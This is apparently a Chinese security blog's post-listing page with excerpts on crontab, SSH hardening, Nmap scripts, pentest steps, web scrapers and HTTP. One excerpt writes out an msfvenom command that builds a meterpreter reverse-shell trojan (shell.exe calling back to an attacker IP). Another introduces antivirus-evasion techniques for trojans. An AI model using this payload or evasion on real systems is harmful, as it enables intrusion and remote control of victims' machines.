自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(9)
  • 资源 (6)
  • 收藏
  • 关注

原创 Mac crontab使用问题总结

crontab用法:Linux crontab 命令 | 菜鸟教程Linux和Mac的用法基本一致常用命令:crontab -l 查看当前定时任务 crontab -e 编辑定时任务 crontab -r 删除定时任务创建定时任务:开始可以简单尝试crontab 任务是否可以执行,创建一个简单任务,创建后使用crontab -l查看任务是否成功,然后查看date.txt里面有输出没sudo vi crontab -e#每隔一分钟输出date到桌面date.txt中*/1

2022-04-12 15:35:44 2518

原创 SSH 弱密钥交换算法已启用

一、SSH 弱密钥交换算法已启用描述远程 SSH 服务器被配置为允许被认为是弱的密钥交换算法。这是基于 IETF 草案文档 Key Exchange (KEX) Method Updates and Recommendations for Secure Shell (SSH) draft-ietf-curdle-ssh-kex-sha2-20。 第 4 节列出了关于不应该和绝不能启用的密钥交换算法的指南。 这包括:diffie-hellman-group-exchange-sha1diff

2022-03-23 17:47:12 12699

转载 木马免杀方式

前言免杀,又叫免杀毒技术,是反病毒,反间谍的对立面,是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外,还可以扩增病毒木马的功能,改变病毒木马的行为。免杀的基本特征是破坏特征,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。免杀技术也并不是十恶不赦的,例如,在软件保护所用的加密产品(比如壳)中,有一些会被杀毒软件认为是木马病毒;一些安全领域中的部分安全检测产品,也会被杀毒软件误杀,这时就需要免杀技术来应对这些不稳定因素。1、裸

2022-01-05 10:07:20 6290 3

原创 利用python中的正则爬虫

以FreeBuf的首页为例爬取链接和标题# coding:utf-8import requestsfrom bs4 import BeautifulSoupimport redef get_data(): url = "https://www.freebuf.com/" headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/2010

2021-12-10 14:58:57 560

原创 利用Python中的Xpath获取节点爬虫

以FreeBuf的首页为例爬取链接和标题import requestsfrom lxml import etreeheaders = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0' }def getTree(url): res = requests.get(url,headers,timeout = 5)

2021-12-09 15:45:48 1077

转载 Nmap脚本总结(看这一篇就够了)

原文地址:http://drops.wooyun.org/tips/21880x01 nmap按脚本分类扫描nmap脚本主要分为以下几类,在扫描时可根据需要设置--script=类别这种方式进行比较笼统的扫描:auth: 负责处理鉴权证书(绕开鉴权)的脚本 broadcast: 在局域网内探查更多服务开启状况,如dhcp/dns/sqlserver等服务 brute: 提供暴力破解方式,针对常见的应用如http/snmp等 default: 使用-sC或-A选项扫描时候默认的脚本,

2021-12-06 09:26:29 4709

原创 渗透测试步骤

#记录一下渗透测试中的一些知识点#渗透测试可以说是模拟黑客入侵的行为,与之不同的是,我们目的是提高系统的安全性,保护系统而进行的测试。常规渗透测试基本步骤,主要分为8个步骤:明确目标、信息收集、漏洞探测、漏洞验证、信息分析、获取所需、文档整理、生成报告。流程如下图所示渗透测试基本流程1. 明确目标确定目标范围、限度、需求等,然后制定渗透测试方案: 确定范围:测试目标ip、域名、内外网、测试账户、子网、旁站等。 确定规则:能渗透到什么程度,允许测试的时间段和周期、能否修

2021-11-15 17:07:04 10319 1

原创 msf制作木马反弹shell提权

记录一下目标在有webshell权限下,利用kali的msf制作木马反弹shell过程。方便以后查看启动kali中的msf┌──(root????SC)-[~]└─# msfconsole生成exe类型反弹型木马,LHOST=kali的ipmsf6 > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.173.4 LPORT=4444 -f exe -o shell.exe[*] exec: msfvenom -

2021-11-03 11:19:17 2000

原创 关于HTTP/HTTPS

关于HTTP/HTTPS虽然很熟悉,但是其中原理自认为理解还是不够深入。在网上也看了许多关于HTTP/HTTPS的,这里加上自己理解总结了一下常遇到的问题,顺便巩固一下,方便以后忘记了来查看。一、HTTPHTTP(Hypertext Transfer Prtcl)超文本传输协议是基于TCP/IP协议的应用层协议,主要规定了客户端和服务端之间的通信格式,默认80端口(浏览器默认)。请求报文格式<method><request-URL><version>&

2021-10-22 11:00:18 780

关于扫描渗透测试漏洞报告模版

关于扫描渗透测试漏洞报告模版

2022-08-04

web安全漏洞挖掘梳理

web安全漏洞挖掘梳理

2022-06-22

web安全逻辑漏洞挖掘

web安全逻辑漏洞挖掘

2022-06-22

web安全漏洞加固手册

web安全漏洞加固手册

2022-06-22

2021-AWVS14

扫描工具

2022-06-09

2021-7-burpsuit

安全工具及资料

2022-03-27

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除